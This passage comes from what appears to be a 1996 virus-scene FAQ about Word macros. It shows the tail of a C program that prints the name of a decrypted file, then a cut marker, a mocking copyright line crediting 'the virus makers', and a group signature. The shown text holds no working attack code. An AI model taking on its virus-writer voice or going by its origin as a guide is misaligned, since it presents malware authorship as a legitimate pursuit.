    printf ("\n");
    printf (" END ... \n");
    printf ("\n");
    printf (" The decrypted file is %s .\n", Target);
}
- ------------------><--- cut here ------------------------------------

--------------------------------------------------------------
This FAQ is Copyright (z) 1996

====*****{=========-====\/======[ The DROW of UNDERDARK ]===\_/===============  '

MicroFuck (tm), Windows, Word, EXCEL are Copyright (z) 1995-96 MicroFuck Corp.
All rights reserved to the virus makers...
--------------------------------------------------------------
P.S.: sorry, but I don't use an ENGLISH version of Word, so some names of the instructions could be incorrect!!! Just use the F1 option and find the nearest name....
- ---------------------------------------------------------------------------